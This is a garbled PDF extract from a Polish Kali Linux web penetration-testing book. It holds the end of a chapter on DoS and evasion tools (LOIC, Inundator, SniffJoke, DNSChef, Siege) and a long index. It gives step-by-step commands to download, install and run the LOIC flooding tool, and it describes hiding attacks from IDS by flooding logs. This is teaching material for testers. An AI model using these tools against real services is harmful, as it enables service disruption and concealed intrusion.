Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 41: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

